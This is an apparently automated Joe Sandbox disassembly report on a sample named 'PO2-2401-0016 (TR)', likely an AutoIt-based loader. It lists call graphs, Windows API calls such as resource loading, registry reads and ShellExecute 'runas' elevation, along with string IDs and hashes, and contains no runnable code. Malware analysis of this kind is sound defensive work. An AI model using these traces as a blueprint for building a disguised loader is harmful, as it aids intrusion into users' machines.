98423->98427 98431 183405 11 API calls 2 library calls 98423->98431 98424 1829c8 _free 20 API calls 98426 185071 98424->98426 98426->98413 98427->98424 98428->98410 98429->98412 98430->98412 98431->98423 98432->98402 98434 17096c GetStartupInfoW 98433->98434 98434->98364 98435 151098 98440 1542de 98435->98440 98439 1510a7 98441 15a961 22 API calls 98440->98441 98442 1542f5 GetVersionExW 98441->98442 98443 156b57 22 API calls 98442->98443 98444 154342 98443->98444 98445 1593b2 22 API calls 98444->98445 98455 154378 98444->98455 98446 15436c 98445->98446 98448 1537a0 22 API calls 98446->98448 98447 15441b GetCurrentProcess IsWow64Process 98449 154437 98447->98449 98448->98455 98450 15444f LoadLibraryA 98449->98450 98451 193824 GetSystemInfo 98449->98451 98452 154460 GetProcAddress 98450->98452 98453 15449c GetSystemInfo 98450->98453 98452->98453 98457 
154470 GetNativeSystemInfo 98452->98457 98454 154476 98453->98454 98458 15109d 98454->98458 98459 15447a FreeLibrary 98454->98459 98455->98447 98456 1937df 98455->98456 98457->98454 98460 1700a3 29 API calls __onexit 98458->98460 98459->98458 98460->98439 98461 15105b 98466 15344d 98461->98466 98463 15106a 98497 1700a3 29 API calls __onexit 98463->98497 98465 151074 98467 15345d __wsopen_s 98466->98467 98468 15a961 22 API calls 98467->98468 98469 153513 98468->98469 98470 153a5a 24 API calls 98469->98470 98471 15351c 98470->98471 98498 153357 98471->98498 98474 1533c6 22 API calls 98475 153535 98474->98475 98476 15515f 22 API calls 98475->98476 98477 153544 98476->98477 98478 15a961 22 API calls 98477->98478 98479 15354d 98478->98479 98480 15a6c3 22 API calls 98479->98480 98481 153556 RegOpenKeyExW 98480->98481 98482 193176 RegQueryValueExW 98481->98482 98487 153578 98481->98487 98483 19320c RegCloseKey 98482->98483 98484 193193 98482->98484 98483->98487 98496 19321e _wcslen 98483->98496 98485 16fe0b 22 API calls 98484->98485 98486 1931ac 98485->98486 98488 155722 22 API calls 98486->98488 98487->98463 98489 1931b7 RegQueryValueExW 98488->98489 98491 1931d4 98489->98491 98493 1931ee messages 98489->98493 98490 154c6d 22 API calls 98490->98496 98492 156b57 22 API calls 98491->98492 98492->98493 98493->98483 98494 159cb3 22 API calls 98494->98496 98495 15515f 22 API calls 98495->98496 98496->98487 98496->98490 98496->98494 98496->98495 98497->98465 98499 191f50 __wsopen_s 98498->98499 98500 153364 GetFullPathNameW 98499->98500 98501 153386 98500->98501 98502 156b57 22 API calls 98501->98502 98503 1533a4 98502->98503 98503->98474 98504 1a3f75 98515 16ceb1 98504->98515 98506 1a3f8b 98507 1a4006 98506->98507 98582 16e300 23 API calls 98506->98582 98524 15bf40 98507->98524 98510 1a4052 98513 1a4a88 98510->98513 98584 1c359c 82 API calls __wsopen_s 98510->98584 98512 1a3fe6 98512->98510 98583 1c1abf 22 API calls 98512->98583 98516 16ced2 98515->98516 98517 16cebf 
98515->98517 98519 16ced7 98516->98519 98520 16cf05 98516->98520 98585 15aceb 23 API calls messages 98517->98585 98521 16fddb 22 API calls 98519->98521 98586 15aceb 23 API calls messages 98520->98586 98523 16cec9 98521->98523 98523->98506 98587 15adf0 98524->98587 98526 15bf9d 98527 1a04b6 98526->98527 98528 15bfa9 98526->98528 98606 1c359c 82 API calls __wsopen_s 98527->98606 98529 1a04c6 98528->98529 98530 15c01e 98528->98530 98607 1c359c 82 API calls __wsopen_s 98529->98607 98592 15ac91 98530->98592 98534 15c7da 98539 16fe0b 22 API calls 98534->98539 98535 1b7120 22 API calls 98568 15c039 __fread_nolock messages 98535->98568 98544 15c808 __fread_nolock 98539->98544 98541 1a04f5 98545 1a055a 98541->98545 98608 16d217 207 API calls 98541->98608 98549 16fe0b 22 API calls 98544->98549 98581 15c603 98545->98581 98609 1c359c 82 API calls __wsopen_s 98545->98609 98546 15ec40 207 API calls 98546->98568 98547 15af8a 22 API calls 98547->98568 98548 1a091a 98619 1c3209 23 API calls 98548->98619 98573 15c350 __fread_nolock messages 98549->98573 98552 1a08a5 98553 15ec40 207 API calls 98552->98553 98555 1a08cf 98553->98555 98555->98581 98617 15a81b 41 API calls 98555->98617 98556 1a0591 98610 1c359c 82 API calls __wsopen_s 98556->98610 98557 1a08f6 98618 1c359c 82 API calls __wsopen_s 98557->98618 98562 15bbe0 40 API calls 98562->98568 98563 15c3ac 98563->98510 98565 15c237 98567 15c253 98565->98567 98569 15a8c7 22 API calls 98565->98569 98566 16fddb 22 API calls 98566->98568 98570 1a0976 98567->98570 98575 15c297 messages 98567->98575 98568->98534 98568->98535 98568->98541 98568->98544 98568->98545 98568->98546 98568->98547 98568->98548 98568->98552 98568->98556 98568->98557 98568->98562 98568->98565 98568->98566 98574 1a09bf 98568->98574 98580 16fe0b 22 API calls 98568->98580 98568->98581 98596 15ad81 98568->98596 98611 1b7099 22 API calls __fread_nolock 98568->98611 98612 1d5745 54 API calls _wcslen 98568->98612 98613 16aa42 22 API calls messages 98568->98613 98614 1bf05c 
40 API calls 98568->98614 98615 15a993 41 API calls 98568->98615 98616 15aceb 23 API calls messages 98568->98616 98569->98567 98620 15aceb 23 API calls messages 98570->98620 98573->98563 98605 16ce17 22 API calls messages 98573->98605 98574->98581 98621 1c359c 82 API calls __wsopen_s 98574->98621 98575->98574 98603 15aceb 23 API calls messages 98575->98603 98577 15c335 98577->98574 98578 15c342 98577->98578 98604 15a704 22 API calls messages 98578->98604 98580->98568 98581->98510 98582->98512 98583->98507 98584->98513 98585->98523 98586->98523 98588 15ae01 98587->98588 98591 15ae1c messages 98587->98591 98589 15aec9 22 API calls 98588->98589 98590 15ae09 CharUpperBuffW 98589->98590 98590->98591 98591->98526 98593 15acae 98592->98593 98594 15acd1 98593->98594 98622 1c359c 82 API calls __wsopen_s 98593->98622 98594->98568 98597 19fadb 98596->98597 98598 15ad92 98596->98598 98599 16fddb 22 API calls 98598->98599 98600 15ad99 98599->98600 98623 15adcd 98600->98623 98603->98577 98604->98573 98605->98573 98606->98529 98607->98581 98608->98545 98609->98581 98610->98581 98611->98568 98612->98568 98613->98568 98614->98568 98615->98568 98616->98568 98617->98557 98618->98581 98619->98565 98620->98574 98621->98581 98622->98594 98627 15addd 98623->98627 98624 15adb6 98624->98568 98625 16fddb 22 API calls 98625->98627 98626 15a961 22 API calls 98626->98627 98627->98624 98627->98625 98627->98626 98628 15a8c7 22 API calls 98627->98628 98629 15adcd 22 API calls 98627->98629 98628->98627 98629->98627 98630 15dee5 98633 15b710 98630->98633 98634 15b72b 98633->98634 98635 1a00f8 98634->98635 98636 1a0146 98634->98636 98644 15b750 98634->98644 98639 1a0102 98635->98639 98642 1a010f 98635->98642 98635->98644 98675 1d58a2 207 API calls 2 library calls 98636->98675 98673 1d5d33 207 API calls 98639->98673 98655 15ba20 98642->98655 98674 1d61d0 207 API calls 2 library calls 98642->98674 98647 16d336 40 API calls 98644->98647 98650 15ba4e 98644->98650 98652 1a0322 98644->98652 98644->98655 

                                Control-flow Graph
                                APIs
                                • GetVersionExW.KERNEL32(?), ref: 0015430D
                                  • Part of subcall function 00156B57: _wcslen.LIBCMT ref: 00156B6A
                                • GetCurrentProcess.KERNEL32(?,001ECB64,00000000,?,?), ref: 00154422
                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00154429
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00154454
                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00154466
                                • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00154474
                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0015447B
                                • GetSystemInfo.KERNEL32(?,?,?), ref: 001544A0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                • API String ID: 3290436268-3101561225
                                • Opcode ID: 240c760eb0e82da9d2a588675ec6738c74e7775eb517bcdbb185bff271dcdb08
                                • Instruction ID: 22279f1435e5948761dc6f94fb5d01f71915e6be01572e06a91aeca22725e525
                                • Opcode Fuzzy Hash: 240c760eb0e82da9d2a588675ec6738c74e7775eb517bcdbb185bff271dcdb08
                                • Instruction Fuzzy Hash: DCA1B66290A2C0EFCB35CBE97C4C9997FA67B36304B0874D9E45197A61D33046ABCB61

                                Control-flow Graph
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,001550AA,?,?,00000000,00000000), ref: 001542B2
                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001550AA,?,?,00000000,00000000), ref: 001542C9
                                • LoadResource.KERNEL32(?,00000000,?,?,001550AA,?,?,00000000,00000000,?,?,?,?,?,?,00154F20), ref: 001935BE
                                • SizeofResource.KERNEL32(?,00000000,?,?,001550AA,?,?,00000000,00000000,?,?,?,?,?,?,00154F20), ref: 001935D3
                                • LockResource.KERNEL32(001550AA,?,?,001550AA,?,?,00000000,00000000,?,?,?,?,?,?,00154F20,?), ref: 001935E6
                                Strings
                                Similarity
                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                • String ID: SCRIPT
                                • API String ID: 3051347437-3967369404
                                • Opcode ID: ac72ea9211f716bc877a8379519253496d4644c31e57652ac41b0543c50c65cb
                                • Instruction ID: 2d84d6eb4e90176d410e896e0c7df889038c66e723828ae807ea6bd24b13b1cf
                                • Opcode Fuzzy Hash: ac72ea9211f716bc877a8379519253496d4644c31e57652ac41b0543c50c65cb
                                • Instruction Fuzzy Hash: 2711C270200701FFD7218BA5EC88F2B7BB9EBC5B56F104169F913CA550DB71DC458660

                                Control-flow Graph

                                APIs
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00152B6B
                                  • Part of subcall function 00153A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00221418,?,00152E7F,?,?,?,00000000), ref: 00153A78
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • GetForegroundWindow.USER32(runas,?,?,?,?,?,00212224), ref: 00192C10
                                • ShellExecuteW.SHELL32(00000000,?,?,00212224), ref: 00192C17
                                Strings
                                Similarity
                                • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                • String ID: runas
                                • API String ID: 448630720-4000483414
                                • Opcode ID: e50f6e55f76ede0e761e3f6fda2396a622f24f592215c04e1027b608a76ea3cb
                                • Instruction ID: ebea74c824aaa9a418887711b52f2fa7500cc38d7cba04a52d75cc58b4ae3fb6
                                • Opcode Fuzzy Hash: e50f6e55f76ede0e761e3f6fda2396a622f24f592215c04e1027b608a76ea3cb
                                • Instruction Fuzzy Hash: AC119332204345EAC718FFA0E851DAD77A4ABB6342F44142DF8765F0A2DF31955EC752
                                Strings
                                Similarity
                                • API ID: BuffCharUpper
                                • String ID: p#"
                                • API String ID: 3964851224-3229190087
                                • Opcode ID: d0026ee3e753e596f81d6020c76d5e45b63fedfacbc46a82ea40d962472e60ba
                                • Instruction ID: 18b92ae40d694f8b4b1cb67cbbd9c609072b49c9e47cf5b2eff5ebb1d2d24c39
                                • Opcode Fuzzy Hash: d0026ee3e753e596f81d6020c76d5e45b63fedfacbc46a82ea40d962472e60ba
                                • Instruction Fuzzy Hash: 2EA26A74A08301DFC715DF18C480B6ABBE1BF99304F15896DE8AA9B352D771EC49CB92
                                APIs
                                • GetInputState.USER32 ref: 0015D807
                                • timeGetTime.WINMM ref: 0015DA07
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0015DB28
                                • TranslateMessage.USER32(?), ref: 0015DB7B
                                • DispatchMessageW.USER32(?), ref: 0015DB89
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0015DB9F
                                • Sleep.KERNEL32(0000000A), ref: 0015DBB1
                                Similarity
                                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                • String ID:
                                • API String ID: 2189390790-0
                                • Opcode ID: 0577c5e354dd718572b26cae2bed41be53fd03a8aed88c9ea8e76b7ff5336e3d
                                • Instruction ID: 9eef2bd8b21c24a71ea063b0ad71f7351fae7f4cc0c81e5461f4bfac29f06e6a
                                • Opcode Fuzzy Hash: 0577c5e354dd718572b26cae2bed41be53fd03a8aed88c9ea8e76b7ff5336e3d
                                • Instruction Fuzzy Hash: C0422434608341EFD739CF24D884BAAB7E1BF56315F14851DF8668B2A1D770E888CB92

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00153A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00221418,?,00152E7F,?,?,?,00000000), ref: 00153A78
                                  • Part of subcall function 00153357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00153379
                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0015356A
                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0019318D
                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001931CE
                                • RegCloseKey.ADVAPI32(?), ref: 00193210
                                • _wcslen.LIBCMT ref: 00193277
                                • _wcslen.LIBCMT ref: 00193286
                                Strings
                                Similarity
                                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$t?
                                • API String ID: 98802146-1493328028
                                • Opcode ID: 0ff29d405239d2da6a50f1fa2476e460c1d8468c49a05931a03197ba08b14e13
                                • Instruction ID: 387e2a8fa13d084288f1438e1125601ca0a7066f27d1997106f025b3993c0680
                                • Opcode Fuzzy Hash: 0ff29d405239d2da6a50f1fa2476e460c1d8468c49a05931a03197ba08b14e13
                                • Instruction Fuzzy Hash: 58717D71404301FEC724EFA5EC8586BBBE8FFA4340B80146EF955971A1EB359A4ECB52

                                Control-flow Graph

                                APIs
                                • GetSysColorBrush.USER32(0000000F), ref: 00152D07
                                • RegisterClassExW.USER32(00000030), ref: 00152D31
                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00152D42
                                • InitCommonControlsEx.COMCTL32(?), ref: 00152D5F
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00152D6F
                                • LoadIconW.USER32(000000A9), ref: 00152D85
                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00152D94
                                Strings
                                Similarity
                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                • API String ID: 2914291525-1005189915
                                • Opcode ID: 393e87357262f625bcd433c5f229192c53d5805d20eff818350458c81381a417
                                • Instruction ID: f220f92beb78e75089e2b27634b59152673c77134e32fc2e4ae806c0524f9357
                                • Opcode Fuzzy Hash: 393e87357262f625bcd433c5f229192c53d5805d20eff818350458c81381a417
                                • Instruction Fuzzy Hash: E521B2B5D01258AFDB10DFE8ED89A9DBBB4FB08704F00511AF911AA2A0D7B14596CF91

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0019039A: CreateFileW.KERNELBASE(00000000,00000000,?,00190704,?,?,00000000,?,00190704,00000000,0000000C), ref: 001903B7
                                • GetLastError.KERNEL32 ref: 0019076F
                                • __dosmaperr.LIBCMT ref: 00190776
                                • GetFileType.KERNELBASE(00000000), ref: 00190782
                                • GetLastError.KERNEL32 ref: 0019078C
                                • __dosmaperr.LIBCMT ref: 00190795
                                • CloseHandle.KERNEL32(00000000), ref: 001907B5
                                • CloseHandle.KERNEL32(?), ref: 001908FF
                                • GetLastError.KERNEL32 ref: 00190931
                                • __dosmaperr.LIBCMT ref: 00190938
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: H
                                • API String ID: 4237864984-2852464175
                                • Opcode ID: dd29e7648831ef77aae96efeb2537e84f0c64d52af1e53b066db5272329f35da
                                • Instruction ID: 896c7a75568dfb04cb60b2deaf355aae5e2707f52066c283392bd72e4042ca27
                                • Opcode Fuzzy Hash: dd29e7648831ef77aae96efeb2537e84f0c64d52af1e53b066db5272329f35da
                                • Instruction Fuzzy Hash: 60A12632A041449FDF1AEFA8DC95BAE7BA1AB0A320F14415DF8159F392DB319D13CB91

                                Control-flow Graph

                                APIs
                                • GetSysColorBrush.USER32(0000000F), ref: 00152B8E
                                • LoadCursorW.USER32(00000000,00007F00), ref: 00152B9D
                                • LoadIconW.USER32(00000063), ref: 00152BB3
                                • LoadIconW.USER32(000000A4), ref: 00152BC5
                                • LoadIconW.USER32(000000A2), ref: 00152BD7
                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00152BEF
                                • RegisterClassExW.USER32(?), ref: 00152C40
                                  • Part of subcall function 00152CD4: GetSysColorBrush.USER32(0000000F), ref: 00152D07
                                  • Part of subcall function 00152CD4: RegisterClassExW.USER32(00000030), ref: 00152D31
                                  • Part of subcall function 00152CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00152D42
                                  • Part of subcall function 00152CD4: InitCommonControlsEx.COMCTL32(?), ref: 00152D5F
                                  • Part of subcall function 00152CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00152D6F
                                  • Part of subcall function 00152CD4: LoadIconW.USER32(000000A9), ref: 00152D85
                                  • Part of subcall function 00152CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00152D94
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                • String ID: #$0$AutoIt v3
                                • API String ID: 423443420-4155596026
                                • Opcode ID: c619eebd999e65a80e4f93fded6aea761491e80e4d3b47599afd59e7125f83f3
                                • Instruction ID: 1304dc6d78f2f16c4ba3c4b46fe6eae8ac0fdc18bf6d3dc6ab4368f21da69224
                                • Opcode Fuzzy Hash: c619eebd999e65a80e4f93fded6aea761491e80e4d3b47599afd59e7125f83f3
                                • Instruction Fuzzy Hash: 0021FA71E00354BBDB20DFE5FC99E9D7FB6FB58B50F0410AAE500A66A0D7B105528F90
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 0015BB4E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Init_thread_footer
                                • String ID: p#"$p#"$p#"$p#"$p%"$p%"$x#"$x#"
                                • API String ID: 1385522511-472378502
                                • Opcode ID: 139e494c872fa41b7d973e50d48a697de931f71e8f7b9ae1669ed628fd49fdbf
                                • Instruction ID: ea858f5c6a0ce23db74ff6d3d8262d06f45044c58e647233fbd964ba8a41ae3d
                                • Opcode Fuzzy Hash: 139e494c872fa41b7d973e50d48a697de931f71e8f7b9ae1669ed628fd49fdbf
                                • Instruction Fuzzy Hash: CC32EB78A08209EFCB24CF54C884ABAB7B9FF49301F158059ED25AF291C775ED49CB91

                                Control-flow Graph

                                APIs
                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0015316A,?,?), ref: 001531D8
                                • KillTimer.USER32(?,00000001,?,?,?,?,?,0015316A,?,?), ref: 00153204
                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00153227
                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0015316A,?,?), ref: 00153232
                                • CreatePopupMenu.USER32 ref: 00153246
                                • PostQuitMessage.USER32(00000000), ref: 00153267
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                • String ID: TaskbarCreated
                                • API String ID: 129472671-2362178303
                                • Opcode ID: b0f331cab91a1ba589bef847fbeb9a3e474c748e66f85cc96c5cb3523cfc6dbe
                                • Instruction ID: 389454fc490a789ce3d0748bcb41b302b47e659529619440398dac85b043004b
                                • Opcode Fuzzy Hash: b0f331cab91a1ba589bef847fbeb9a3e474c748e66f85cc96c5cb3523cfc6dbe
                                • Instruction Fuzzy Hash: 36416B34600644FBDF286BF8AC8DF7D3A5AE715382F040125FD318F1A1CB718A9997A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID: D%"$D%"$D%"$D%"$D%"D%"$Variable must be of type 'Object'.
                                • API String ID: 0-2232411389
                                • Opcode ID: cd651e4ffac6cb25faf0d266797103f81c1c40d134659d7caa8a82d1982648a1
                                • Instruction ID: 35e466c78d2816cd3f2abdd6d4dc664f1d3f82cf47a0d9dfad153ee2f59ce889
                                • Opcode Fuzzy Hash: cd651e4ffac6cb25faf0d266797103f81c1c40d134659d7caa8a82d1982648a1
                                • Instruction Fuzzy Hash: A2C29C75E00204DFCB28CF98D884BADB7F1BF19311F258159E925AB291D331EE5ACB91

                                Control-flow Graph

                                APIs
                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 036DFB11
                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 036DFD37
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateFileFreeVirtual
                                • String ID:
                                • API String ID: 204039940-0
                                • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                • Instruction ID: 49c8d9360d4111c22e692f2f00ebe6858743781dc25aef8bea2ef1e5ea9f740d
                                • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                • Instruction Fuzzy Hash: 8CA10574E00209EBDB14CFA4C994BEEBBB5FF48304F248599E506BB380D7759A81CB94

                                Control-flow Graph

                                APIs
                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00152C91
                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00152CB2
                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00151CAD,?), ref: 00152CC6
                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00151CAD,?), ref: 00152CCF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$CreateShow
                                • String ID: AutoIt v3$edit
                                • API String ID: 1584632944-3779509399
                                • Opcode ID: 609bedc9f948df990950406489f3f230b16dc9bb547066eab377f04b45e4842f
                                • Instruction ID: b3610b9807e9c10911eb4002153c4be3c31df604297b6eb06743b222432c2d5d
                                • Opcode Fuzzy Hash: 609bedc9f948df990950406489f3f230b16dc9bb547066eab377f04b45e4842f
                                • Instruction Fuzzy Hash: 6BF03A759403D47AEB304797BC4CE7B3EBED7DAF50B0110AAF900A65A0C2710862DAB0

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00151BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00151BF4
                                  • Part of subcall function 00151BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00151BFC
                                  • Part of subcall function 00151BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00151C07
                                  • Part of subcall function 00151BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00151C12
                                  • Part of subcall function 00151BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00151C1A
                                  • Part of subcall function 00151BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00151C22
                                  • Part of subcall function 00151B4A: RegisterWindowMessageW.USER32(00000004,?,001512C4), ref: 00151BA2
                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0015136A
                                • OleInitialize.OLE32 ref: 00151388
                                • CloseHandle.KERNEL32(00000000,00000000), ref: 001924AB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
